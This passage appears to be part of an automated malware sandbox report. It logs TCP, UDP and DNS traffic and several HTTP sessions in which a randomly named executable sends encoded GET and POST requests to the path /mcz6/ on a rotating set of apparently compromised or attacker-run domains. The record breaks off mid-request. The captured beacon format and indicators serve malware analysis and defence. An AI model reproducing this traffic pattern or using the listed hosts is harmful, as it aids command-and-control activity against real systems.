Jun 6, 2024 13:29:06.416491985 CEST	80	49792	57.151.38.169	192.168.2.4
Jun 6, 2024 13:29:06.416517019 CEST	80	49792	57.151.38.169	192.168.2.4
Jun 6, 2024 13:29:06.416742086 CEST	80	49792	57.151.38.169	192.168.2.4
Jun 6, 2024 13:29:06.416755915 CEST	80	49792	57.151.38.169	192.168.2.4
Jun 6, 2024 13:29:06.416784048 CEST	80	49792	57.151.38.169	192.168.2.4
Jun 6, 2024 13:29:06.416796923 CEST	80	49792	57.151.38.169	192.168.2.4
Jun 6, 2024 13:29:06.416810036 CEST	80	49792	57.151.38.169	192.168.2.4
Jun 6, 2024 13:29:07.085630894 CEST	80	49792	57.151.38.169	192.168.2.4
Jun 6, 2024 13:29:07.127715111 CEST	49792	80	192.168.2.4	57.151.38.169
Jun 6, 2024 13:29:07.128623009 CEST	80	49792	57.151.38.169	192.168.2.4
Jun 6, 2024 13:29:07.128670931 CEST	49792	80	192.168.2.4	57.151.38.169
Jun 6, 2024 13:29:07.924710035 CEST	49792	80	192.168.2.4	57.151.38.169
Jun 6, 2024 13:29:08.943244934 CEST	49793	80	192.168.2.4	57.151.38.169
Jun 6, 2024 13:29:08.948348045 CEST	80	49793	57.151.38.169	192.168.2.4
Jun 6, 2024 13:29:08.948445082 CEST	49793	80	192.168.2.4	57.151.38.169
Jun 6, 2024 13:29:08.950222969 CEST	49793	80	192.168.2.4	57.151.38.169
Jun 6, 2024 13:29:08.955225945 CEST	80	49793	57.151.38.169	192.168.2.4
Jun 6, 2024 13:29:09.618510008 CEST	80	49793	57.151.38.169	192.168.2.4
Jun 6, 2024 13:29:09.659003973 CEST	49793	80	192.168.2.4	57.151.38.169
Jun 6, 2024 13:29:09.659499884 CEST	80	49793	57.151.38.169	192.168.2.4
Jun 6, 2024 13:29:09.659693956 CEST	49793	80	192.168.2.4	57.151.38.169
Jun 6, 2024 13:29:09.660809040 CEST	49793	80	192.168.2.4	57.151.38.169
Jun 6, 2024 13:29:09.665965080 CEST	80	49793	57.151.38.169	192.168.2.4
Jun 6, 2024 13:29:14.679092884 CEST	49794	80	192.168.2.4	162.241.216.140
Jun 6, 2024 13:29:14.684107065 CEST	80	49794	162.241.216.140	192.168.2.4
Jun 6, 2024 13:29:14.684308052 CEST	49794	80	192.168.2.4	162.241.216.140
Jun 6, 2024 13:29:14.686695099 CEST	49794	80	192.168.2.4	162.241.216.140
Jun 6, 2024 13:29:14.691570044 CEST	80	49794	162.241.216.140	192.168.2.4
Jun 6, 2024 13:29:15.352900982 CEST	80	49794	162.241.216.140	192.168.2.4
Jun 6, 2024 13:29:15.385322094 CEST	80	49794	162.241.216.140	192.168.2.4
Jun 6, 2024 13:29:15.385375023 CEST	49794	80	192.168.2.4	162.241.216.140
Jun 6, 2024 13:29:16.190460920 CEST	49794	80	192.168.2.4	162.241.216.140

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Jun 6, 2024 13:25:26.184272051 CEST	55326	53	192.168.2.4	1.1.1.1
Jun 6, 2024 13:25:42.053932905 CEST	52271	53	192.168.2.4	1.1.1.1
Jun 6, 2024 13:25:42.125408888 CEST	53	52271	1.1.1.1	192.168.2.4
Jun 6, 2024 13:25:55.427537918 CEST	53247	53	192.168.2.4	1.1.1.1
Jun 6, 2024 13:25:55.506525993 CEST	53	53247	1.1.1.1	192.168.2.4
Jun 6, 2024 13:26:22.162673950 CEST	51887	53	192.168.2.4	1.1.1.1
Jun 6, 2024 13:26:22.195225954 CEST	53	51887	1.1.1.1	192.168.2.4
Jun 6, 2024 13:26:35.772011995 CEST	65398	53	192.168.2.4	1.1.1.1
Jun 6, 2024 13:26:36.360291004 CEST	53	65398	1.1.1.1	192.168.2.4
Jun 6, 2024 13:26:49.977319002 CEST	53427	53	192.168.2.4	1.1.1.1
Jun 6, 2024 13:26:50.014038086 CEST	53	53427	1.1.1.1	192.168.2.4
Jun 6, 2024 13:27:03.334681988 CEST	52148	53	192.168.2.4	1.1.1.1
Jun 6, 2024 13:27:03.370750904 CEST	53	52148	1.1.1.1	192.168.2.4
Jun 6, 2024 13:27:11.428092957 CEST	62137	53	192.168.2.4	1.1.1.1
Jun 6, 2024 13:27:11.737770081 CEST	53	62137	1.1.1.1	192.168.2.4
Jun 6, 2024 13:27:25.037226915 CEST	50634	53	192.168.2.4	1.1.1.1
Jun 6, 2024 13:27:25.047724962 CEST	53	50634	1.1.1.1	192.168.2.4
Jun 6, 2024 13:27:33.099628925 CEST	61590	53	192.168.2.4	1.1.1.1
Jun 6, 2024 13:27:33.316777945 CEST	53	61590	1.1.1.1	192.168.2.4
Jun 6, 2024 13:27:47.350306988 CEST	63780	53	192.168.2.4	1.1.1.1
Jun 6, 2024 13:27:47.428133011 CEST	53	63780	1.1.1.1	192.168.2.4
Jun 6, 2024 13:28:01.021544933 CEST	62014	53	192.168.2.4	1.1.1.1
Jun 6, 2024 13:28:01.051335096 CEST	53	62014	1.1.1.1	192.168.2.4
Jun 6, 2024 13:28:09.115417957 CEST	62863	53	192.168.2.4	1.1.1.1
Jun 6, 2024 13:28:09.324081898 CEST	53	62863	1.1.1.1	192.168.2.4
Jun 6, 2024 13:28:22.599831104 CEST	49815	53	192.168.2.4	1.1.1.1
Jun 6, 2024 13:28:22.633397102 CEST	53	49815	1.1.1.1	192.168.2.4
Jun 6, 2024 13:28:30.693413973 CEST	53768	53	192.168.2.4	1.1.1.1
Jun 6, 2024 13:28:30.706459999 CEST	53	53768	1.1.1.1	192.168.2.4

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Jun 6, 2024 13:25:26.184272051 CEST	192.168.2.4	1.1.1.1	0xef8b	Standard query (0)	www.dty377.com	A (IP address)	IN (0x0001)	false
Jun 6, 2024 13:25:42.053932905 CEST	192.168.2.4	1.1.1.1	0xc5e2	Standard query (0)	www.lenslaser.com	A (IP address)	IN (0x0001)	false
Jun 6, 2024 13:25:55.427537918 CEST	192.168.2.4	1.1.1.1	0x6f25	Standard query (0)	www.allinone24.shop	A (IP address)	IN (0x0001)	false
Jun 6, 2024 13:26:22.162673950 CEST	192.168.2.4	1.1.1.1	0x3c13	Standard query (0)	www.carliente.com	A (IP address)	IN (0x0001)	false
Jun 6, 2024 13:26:35.772011995 CEST	192.168.2.4	1.1.1.1	0x12ad	Standard query (0)	www.walletweb367.top	A (IP address)	IN (0x0001)	false
Jun 6, 2024 13:26:49.977319002 CEST	192.168.2.4	1.1.1.1	0x3d08	Standard query (0)	www.deaybrid.info	A (IP address)	IN (0x0001)	false
Jun 6, 2024 13:27:03.334681988 CEST	192.168.2.4	1.1.1.1	0x321a	Standard query (0)	www.prizesupermarket.com	A (IP address)	IN (0x0001)	false
Jun 6, 2024 13:27:11.428092957 CEST	192.168.2.4	1.1.1.1	0x414b	Standard query (0)	www.jrksa.info	A (IP address)	IN (0x0001)	false
Jun 6, 2024 13:27:25.037226915 CEST	192.168.2.4	1.1.1.1	0xd263	Standard query (0)	www.cookedatthebottom.com	A (IP address)	IN (0x0001)	false
Jun 6, 2024 13:27:33.099628925 CEST	192.168.2.4	1.1.1.1	0xd71b	Standard query (0)	www.celebration24.co.uk	A (IP address)	IN (0x0001)	false
Jun 6, 2024 13:27:47.350306988 CEST	192.168.2.4	1.1.1.1	0x9c8d	Standard query (0)	www.gledingakademiet.no	A (IP address)	IN (0x0001)	false
Jun 6, 2024 13:28:01.021544933 CEST	192.168.2.4	1.1.1.1	0xf184	Standard query (0)	www.alfaspa.net	A (IP address)	IN (0x0001)	false
Jun 6, 2024 13:28:09.115417957 CEST	192.168.2.4	1.1.1.1	0xf48b	Standard query (0)	www.zwervertjes.be	A (IP address)	IN (0x0001)	false
Jun 6, 2024 13:28:22.599831104 CEST	192.168.2.4	1.1.1.1	0x28c	Standard query (0)	www.maerealtysg.com	A (IP address)	IN (0x0001)	false
Jun 6, 2024 13:28:30.693413973 CEST	192.168.2.4	1.1.1.1	0xdc6e	Standard query (0)	www.polhi.lol	A (IP address)	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class	DNS over HTTPS
Jun 6, 2024 13:25:26.225779057 CEST	1.1.1.1	192.168.2.4	0xef8b	No error (0)	www.dty377.com	d.gtm-cloudflare.net		CNAME (Canonical name)	IN (0x0001)	false
Jun 6, 2024 13:25:26.225779057 CEST	1.1.1.1	192.168.2.4	0xef8b	No error (0)	d.gtm-cloudflare.net	gtm-sg-r0v3jyeyr02.gtm-alibaba.net		CNAME (Canonical name)	IN (0x0001)	false
Jun 6, 2024 13:25:26.225779057 CEST	1.1.1.1	192.168.2.4	0xef8b	No error (0)	gtm-sg-r0v3jyeyr02.gtm-alibaba.net	bvty.gtm-cloudflare.net.cdn.cloudflare.net		CNAME (Canonical name)	IN (0x0001)	false
Jun 6, 2024 13:25:26.225779057 CEST	1.1.1.1	192.168.2.4	0xef8b	No error (0)	bf25cccbe24946c2a82ffd27a4b80f42.pacloudflare.com		172.65.176.239	A (IP address)	IN (0x0001)	false
Jun 6, 2024 13:25:42.125408888 CEST	1.1.1.1	192.168.2.4	0xc5e2	No error (0)	www.lenslaser.com	lenslaser.com		CNAME (Canonical name)	IN (0x0001)	false
Jun 6, 2024 13:25:42.125408888 CEST	1.1.1.1	192.168.2.4	0xc5e2	No error (0)	lenslaser.com		162.241.216.140	A (IP address)	IN (0x0001)	false
Jun 6, 2024 13:25:55.506525993 CEST	1.1.1.1	192.168.2.4	0x6f25	No error (0)	www.allinone24.shop	allinonestore-567794-react-native.b567794.prod.eastus.az.svc.builder.ai		CNAME (Canonical name)	IN (0x0001)	false
Jun 6, 2024 13:25:55.506525993 CEST	1.1.1.1	192.168.2.4	0x6f25	No error (0)	allinonestore-567794-react-native.b567794.prod.eastus.az.svc.builder.ai		57.151.38.169	A (IP address)	IN (0x0001)	false
Jun 6, 2024 13:26:22.195225954 CEST	1.1.1.1	192.168.2.4	0x3c13	No error (0)	www.carliente.com	carliente.com		CNAME (Canonical name)	IN (0x0001)	false
Jun 6, 2024 13:26:22.195225954 CEST	1.1.1.1	192.168.2.4	0x3c13	No error (0)	carliente.com		217.160.0.111	A (IP address)	IN (0x0001)	false
Jun 6, 2024 13:26:36.360291004 CEST	1.1.1.1	192.168.2.4	0x12ad	No error (0)	www.walletweb367.top		91.195.240.123	A (IP address)	IN (0x0001)	false
Jun 6, 2024 13:26:50.014038086 CEST	1.1.1.1	192.168.2.4	0x3d08	No error (0)	www.deaybrid.info		162.0.237.22	A (IP address)	IN (0x0001)	false
Jun 6, 2024 13:27:03.370750904 CEST	1.1.1.1	192.168.2.4	0x321a	Name error (3)	www.prizesupermarket.com	none	none	A (IP address)	IN (0x0001)	false
Jun 6, 2024 13:27:11.737770081 CEST	1.1.1.1	192.168.2.4	0x414b	No error (0)	www.jrksa.info	zhs.zohosites.com		CNAME (Canonical name)	IN (0x0001)	false
Jun 6, 2024 13:27:11.737770081 CEST	1.1.1.1	192.168.2.4	0x414b	No error (0)	zhs.zohosites.com		136.143.180.12	A (IP address)	IN (0x0001)	false
Jun 6, 2024 13:27:25.047724962 CEST	1.1.1.1	192.168.2.4	0xd263	Name error (3)	www.cookedatthebottom.com	none	none	A (IP address)	IN (0x0001)	false
Jun 6, 2024 13:27:33.316777945 CEST	1.1.1.1	192.168.2.4	0xd71b	No error (0)	www.celebration24.co.uk		103.168.172.37	A (IP address)	IN (0x0001)	false
Jun 6, 2024 13:27:33.316777945 CEST	1.1.1.1	192.168.2.4	0xd71b	No error (0)	www.celebration24.co.uk		103.168.172.52	A (IP address)	IN (0x0001)	false
Jun 6, 2024 13:27:47.428133011 CEST	1.1.1.1	192.168.2.4	0x9c8d	No error (0)	www.gledingakademiet.no		104.37.39.71	A (IP address)	IN (0x0001)	false
Jun 6, 2024 13:28:01.051335096 CEST	1.1.1.1	192.168.2.4	0xf184	Name error (3)	www.alfaspa.net	none	none	A (IP address)	IN (0x0001)	false
Jun 6, 2024 13:28:09.324081898 CEST	1.1.1.1	192.168.2.4	0xf48b	No error (0)	www.zwervertjes.be		199.59.243.225	A (IP address)	IN (0x0001)	false
Jun 6, 2024 13:28:22.633397102 CEST	1.1.1.1	192.168.2.4	0x28c	Name error (3)	www.maerealtysg.com	none	none	A (IP address)	IN (0x0001)	false
Jun 6, 2024 13:28:30.706459999 CEST	1.1.1.1	192.168.2.4	0xdc6e	Name error (3)	www.polhi.lol	none	none	A (IP address)	IN (0x0001)	false

HTTP Request Dependency Graph

www.dty377.com

www.lenslaser.com

www.allinone24.shop

www.carliente.com

www.walletweb367.top

www.deaybrid.info

www.jrksa.info

www.celebration24.co.uk

www.gledingakademiet.no

www.zwervertjes.be

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.4	49743	172.65.176.239	80	4600	C:\Program Files (x86)\VhpozkqFDjnjzKYALFYDYooMXaXPVXDehSdouzyBkGUMaZlRvCRBBcUpEnSRqh\FCJpElfgCpDtTJPmdGdlIYAgNj.exe

Timestamp	Bytes transferred	Direction	Data
Jun 6, 2024 13:25:26.238775015 CEST	479	OUT	GET /mcz6/?l65lvjLx=D5+pF2/O5onkRgs/QJm4Uknwa72XtjRGMQdzYj/9XZpkwzi9ddj0crwo6H79wSPqAuXYaDgjxYH65NOwo1DiSXtozRCrs8BT1aTzU0SzNo1URyRzwyLi3Bw=&Znv8F=zltpR6V05ztTbh HTTP/1.1 Host: www.dty377.com Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Language: en-US,en;q=0.9 Connection: close User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64; rv:36.0) Gecko/20100101 Firefox/36.0
Jun 6, 2024 13:25:27.009924889 CEST	1236	IN	HTTP/1.1 410 Gone Server: WAF Date: Thu, 06 Jun 2024 11:25:26 GMT Transfer-Encoding: chunked Connection: close Set-Cookie: http_waf_cookie=f7285217-6e27-451a16f1b7468bd99c2db81d9d471371a6d1; Expires=1717680326; Path=/; HttpOnly Via: 1.1 google X-Request-Id: 3a6ef0939cfc4d053a9776aa76829394 Data Raw: 34 66 33 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 22 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 3e 0a 20 20 3c 74 69 74 6c 65 3e e9 98 bf e9 87 8c e4 ba 91 20 57 65 62 e5 ba 94 e7 94 a8 e9 98 b2 e7 81 ab e5 a2 99 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 3e 0a 20 20 20 20 62 6f 64 79 20 7b 0a 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 34 70 78 3b 0a 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 33 33 33 3b 0a 20 20 20 20 20 20 66 6f 6e 74 2d 77 [TRUNCATED] Data Ascii: 4f3<!DOCTYPE html><html lang="en"><head> <meta charset="UTF-8"> <meta http-equiv="X-UA-Compatible" content="IE=edge"> <meta name="viewport" content="width=device-width, initial-scale=1.0"> <title> Web</title> <style rel="stylesheet"> body { font-size: 14px; color: #333; font-weight: 400; padding: 100px 0px 0px; } .wrapper { width: 850px; margin: 0 auto; } .top-wrapper { padding: 35px 30px 12px; } .top-content-right { padding-top: 20px; } .select-content { display: flex; justify-content: end; } #selectLang { color: rgb(250 100 0) !important; border: 1px solid rgb(250 100 0); } .bottom-wrapper { padding: 0 20px 0 40px; } .bottom-content-one { margin: 30px 0px; } .bottom-content-two { border-top: 1px solid #ededed; p
Jun 6, 2024 13:25:27.009982109 CEST	339	IN	Data Raw: 61 64 64 69 6e 67 2d 74 6f 70 3a 20 33 30 70 78 3b 0a 20 20 20 20 7d 0a 0a 20 20 20 20 2e 74 68 65 6d 65 2d 63 6f 6c 6f 72 20 7b 0a 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 66 66 36 61 30 30 3b 0a 20 20 20 20 7d 0a 0a 20 20 20 20 2e 67 72 65 79 Data Ascii: adding-top: 30px; } .theme-color { color: #ff6a00; } .grey-color1 { color: #999; } .grey-color2 { color: #666; } .background-color { background-color: #fa640008; } .font-weig
Jun 6, 2024 13:25:27.010016918 CEST	1236	IN	Data Raw: 32 35 62 61 0d 0a 62 6f 74 74 6f 6d 31 36 20 7b 0a 20 20 20 20 20 20 6d 61 72 67 69 6e 2d 62 6f 74 74 6f 6d 3a 20 31 36 70 78 3b 0a 20 20 20 20 7d 0a 0a 20 20 20 20 2e 6e 6f 5f 64 65 72 63 69 74 6f 6e 20 7b 0a 20 20 20 20 20 20 74 65 78 74 2d 64 Data Ascii: 25babottom16 { margin-bottom: 16px; } .no_derciton { text-decoration: none; } .flex-content { display: flex; } </style></head><body> <div class="wrapper"> <div class="top-wrapper background-
Jun 6, 2024 13:25:27.010047913 CEST	1236	IN	Data Raw: 51 54 52 68 77 35 2b 47 51 48 73 6f 66 67 79 46 4d 42 48 49 79 65 4f 65 34 41 66 41 46 37 69 5a 38 7a 39 49 73 69 33 72 6d 6b 6f 6e 58 76 2b 62 78 53 55 41 32 54 41 44 37 41 42 39 79 6a 4a 65 56 2f 67 48 69 42 30 70 68 71 35 68 2b 72 31 30 72 54 Data Ascii: QTRhw5+GQHsofgyFMBHIyeOe4AfAF7iZ8z9Isi3rmkonXv+bxSUA2TAD7AB9yjJeV/gHiB0phq5h+r10rTzvPd8Lw/51nsaSidjSVAOjxGAH2GhVgRwR4Wd6B4M9ISiwzmSrsX5OwrCCTjofIRqEaBRK6M4cNA2yj3gnFWfzvpuPvIttBmYGNKhI+W/VYplRLxjCbYdVPpQwXo/JB1AZ7L9vHfU6x3lIn+PSM+jvHlRBRwEw/bi
Jun 6, 2024 13:25:27.010082960 CEST	1236	IN	Data Raw: 4f 52 47 5a 4b 6b 6e 66 39 7a 69 59 6c 73 6b 70 61 76 79 4f 53 35 52 4b 58 57 70 38 45 48 52 54 6e 54 56 34 69 61 61 6c 52 56 4e 39 51 6f 39 78 49 30 35 65 41 76 6f 4b 37 54 58 6f 70 67 74 69 48 50 75 52 48 49 44 49 45 4d 70 52 37 31 46 64 4b 34 Data Ascii: ORGZKknf9ziYlskpavyOS5RKXWp8EHRTnTV4iaalRVN9Qo9xI05eAvoK7TXopgtiHPuRHIDIEMpR71FdK4eLmiUM4xUP49z7qR5yyDW/Htl7HHl6ZyHOcvaqqy2tx6KR7KKcU46Ny3D6i5XHfwQeXJTfBFPxGMz8mRT1JKv3P0wyxRZ59CJurWrDzU4b1lmLZET8PRj5jXm3DLydG5Y9eU8W+eGsbY6t9ZU52ZdOc/VOXT/ddX5
Jun 6, 2024 13:25:27.010305882 CEST	1236	IN	Data Raw: 6e 4e 4c 4f 33 52 7a 56 44 6f 6d 72 6e 46 4d 35 31 46 62 42 46 79 4c 2b 44 6d 53 58 6f 33 4f 5a 57 71 68 70 4f 6a 37 6e 4c 69 6d 55 63 34 50 59 72 44 74 44 54 66 76 45 61 72 46 79 4c 68 73 76 71 43 66 58 35 72 45 68 66 34 56 64 76 39 70 6a 48 50 Data Ascii: nNLO3RzVDomrnFM51FbBFyL+DmSXo3OZWqhpOj7nLimUc4PYrDtDTfvEarFyLhsvqCfX5rEhf4Vdv9pjHPIXC7vughc+CQL+kYHijhPvytX0R56efI8Glv8TzFxjWM6v8XbRTbhdl0Us+umPSG1dHCFmumXQhfMLZejLVToBZFjagk5fyaBA9euawfEb7gbqidRPzeyOS/QQx/M6Zw590PcNNABcCIWBSHKs/GTKDf2xPVILcC5
Jun 6, 2024 13:25:27.010320902 CEST	848	IN	Data Raw: 77 79 34 34 49 6b 69 41 68 5a 42 62 71 6f 35 4c 33 78 4f 45 65 33 36 79 2f 50 6d 49 76 48 38 46 6d 33 65 30 75 52 5a 41 4c 6d 5a 71 76 4e 69 5a 36 41 4a 30 6b 50 4f 65 64 74 2f 78 6b 64 78 58 59 78 62 52 54 6e 6e 6d 34 70 46 6b 30 73 35 35 2b 58 Data Ascii: wy44IkiAhZBbqo5L3xOEe36y/PmIvH8Fm3e0uRZALmZqvNiZ6AJ0kPOedt/xkdxXYxbRTnnm4pFk0s55+XeZ87DUxWn4c45b1UUVsv8WFTOebmPJ/OcT/moHDeiopy3EtNoSefltuc4R63Q+USUzQsiNxR3/Svp+tD7foRz7v6PWCulcJ44BFDWOf/uTnB2KJ41J4B/ETkYV9hbFEejy7rOwt6JcA7ectvmgyylcJ48MlretS32
Jun 6, 2024 13:25:27.010337114 CEST	1236	IN	Data Raw: 43 30 52 6f 58 4d 2b 6f 38 4c 33 50 32 2f 6f 6f 73 38 36 42 7a 6e 36 4f 53 65 48 4c 6f 65 61 4a 6d 7a 71 53 7a 4d 55 43 75 65 59 74 74 59 39 35 7a 67 66 69 58 4c 37 72 45 51 70 74 39 42 76 45 70 79 33 30 66 2f 32 49 61 62 30 35 6b 4a 71 71 5a 73 Data Ascii: C0RoXM+o8L3P2/oos86Bzn6OSeHLoeaJmzqSzMUCueYttY95zgfiXL7rEQpt9BvEpy30f/2Iab05kJqqZsI5M0WnTu9/BI7oZb1uhm8dYpvmdf+nVjwtyDnzZTzMOm35YwLfJyfvgrq3IIfIQ9FjWah84+BL/4Nvgi6RAaecZL8nHeL2xpRzmkAIbeyUPflnHMukkKnIPqZg9y/X5mx6y9SYrGCaf15ncU5zuZEoI+i71KcW2uy
Jun 6, 2024 13:25:27.010502100 CEST	1236	IN	Data Raw: 61 63 65 2d 74 6f 70 38 22 20 73 74 79 6c 65 3d 22 66 6f 6e 74 2d 73 69 7a 65 3a 32 32 70 78 22 20 69 64 3d 22 65 72 72 6f 72 43 6f 64 65 54 69 74 6c 65 22 3e 3c 2f 64 69 76 3e 0a 20 20 20 20 20 20 20 20 20 20 3c 64 69 76 20 69 64 3d 22 65 72 72 Data Ascii: ace-top8" style="font-size:22px" id="errorCodeTitle"></div> <div id="errorCodeInfo"></div> </div> </div> </div> <div class="bottom-wrapper"> <div class="bottom-content-one"> <div class="font-weight
Jun 6, 2024 13:25:27.010516882 CEST	424	IN	Data Raw: 49 66 20 79 6f 75 20 61 72 65 20 61 20 77 65 62 73 69 74 65 20 61 64 6d 69 6e 69 73 74 72 61 74 6f 72 22 2c 0a 20 20 20 20 20 20 22 6d 61 6e 67 65 72 52 6f 6c 65 44 65 61 6c 22 3a 20 22 6c 6f 67 20 6f 6e 20 74 6f 20 74 68 65 20 57 65 62 20 41 70 Data Ascii: If you are a website administrator", "mangerRoleDeal": "log on to the Web Application Firewall console at the earliest opportunity and add the website to Web Application Firewall", "waf": "Web Application Firewall Console >" },
Jun 6, 2024 13:25:27.011138916 CEST	983	IN	Data Raw: e5 8f a3 e6 9c aa e6 8e a5 e5 85 a5 e9 98 bf e9 87 8c e4 ba 91 57 65 62 e5 ba 94 e7 94 a8 e9 98 b2 e7 81 ab e5 a2 99 22 2c 0a 20 20 20 20 20 20 22 76 69 73 69 74 52 6f 6c 65 22 3a 20 22 e5 a6 82 e6 9e 9c e6 82 a8 e6 98 af e7 bd 91 e7 ab 99 e8 ae Data Ascii: Web", "visitRole": "", "visitRoleDeal": "", "mangerRole": "", "mangerRoleDeal": "

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.4	49744	162.241.216.140	80	4600	C:\Program Files (x86)\VhpozkqFDjnjzKYALFYDYooMXaXPVXDehSdouzyBkGUMaZlRvCRBBcUpEnSRqh\FCJpElfgCpDtTJPmdGdlIYAgNj.exe

Timestamp	Bytes transferred	Direction	Data
Jun 6, 2024 13:25:42.135788918 CEST	744	OUT	POST /mcz6/ HTTP/1.1 Host: www.lenslaser.com Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Language: en-US,en;q=0.9 Accept-Encoding: gzip, deflate, br Origin: http://www.lenslaser.com Referer: http://www.lenslaser.com/mcz6/ Connection: close Content-Length: 205 Content-Type: application/x-www-form-urlencoded Cache-Control: max-age=0 User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64; rv:36.0) Gecko/20100101 Firefox/36.0 Data Raw: 6c 36 35 6c 76 6a 4c 78 3d 75 72 34 68 55 52 48 36 48 6b 58 37 54 37 75 44 41 77 56 54 58 31 58 64 76 64 34 44 32 46 4c 56 56 41 6e 75 6a 79 34 73 6d 37 4d 36 64 6d 77 54 65 36 2b 34 6c 30 59 68 58 38 30 5a 36 56 57 30 30 35 73 2b 39 50 54 79 46 75 68 50 5a 4e 6c 61 4e 41 4f 6a 38 49 66 44 41 79 53 76 70 2b 50 36 65 43 63 53 70 4a 63 50 4e 39 51 56 2b 51 47 58 6b 6f 55 64 78 2b 6d 38 31 38 36 46 72 72 66 64 72 61 30 50 53 49 38 52 52 6e 76 38 36 42 6d 34 35 65 2b 4c 36 78 78 77 48 68 45 57 74 65 4d 74 4c 48 6a 48 6b 48 70 72 6a 31 62 50 56 51 50 5a 56 58 75 61 73 4c 36 52 43 61 67 31 51 41 41 61 42 77 3d 3d Data Ascii: l65lvjLx=ur4hURH6HkX7T7uDAwVTX1Xdvd4D2FLVVAnujy4sm7M6dmwTe6+4l0YhX80Z6VW005s+9PTyFuhPZNlaNAOj8IfDAySvp+P6eCcSpJcPN9QV+QGXkoUdx+m8186Frrfdra0PSI8RRnv86Bm45e+L6xxwHhEWteMtLHjHkHprj1bPVQPZVXuasL6RCag1QAAaBw==
Jun 6, 2024 13:25:42.802359104 CEST	479	IN	HTTP/1.1 404 Not Found Date: Thu, 06 Jun 2024 11:25:42 GMT Server: Apache Content-Length: 315 Connection: close Content-Type: text/html; charset=iso-8859-1 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2	192.168.2.4	49745	162.241.216.140	80	4600	C:\Program Files (x86)\VhpozkqFDjnjzKYALFYDYooMXaXPVXDehSdouzyBkGUMaZlRvCRBBcUpEnSRqh\FCJpElfgCpDtTJPmdGdlIYAgNj.exe

Timestamp	Bytes transferred	Direction	Data
Jun 6, 2024 13:25:44.667907953 CEST	764	OUT	POST /mcz6/ HTTP/1.1 Host: www.lenslaser.com Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Language: en-US,en;q=0.9 Accept-Encoding: gzip, deflate, br Origin: http://www.lenslaser.com Referer: http://www.lenslaser.com/mcz6/ Connection: close Content-Length: 225 Content-Type: application/x-www-form-urlencoded Cache-Control: max-age=0 User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64; rv:36.0) Gecko/20100101 Firefox/36.0 Data Raw: 6c 36 35 6c 76 6a 4c 78 3d 75 72 34 68 55 52 48 36 48 6b 58 37 53 62 2b 44 44 54 39 54 56 56 58 65 6a 39 34 44 2f 6c 4c 52 56 41 62 75 6a 32 4a 70 6d 49 34 36 64 48 73 54 66 37 2b 34 6d 30 59 68 50 4d 30 63 6e 46 57 76 30 35 51 32 39 4f 76 79 46 75 31 50 5a 4a 68 61 4e 33 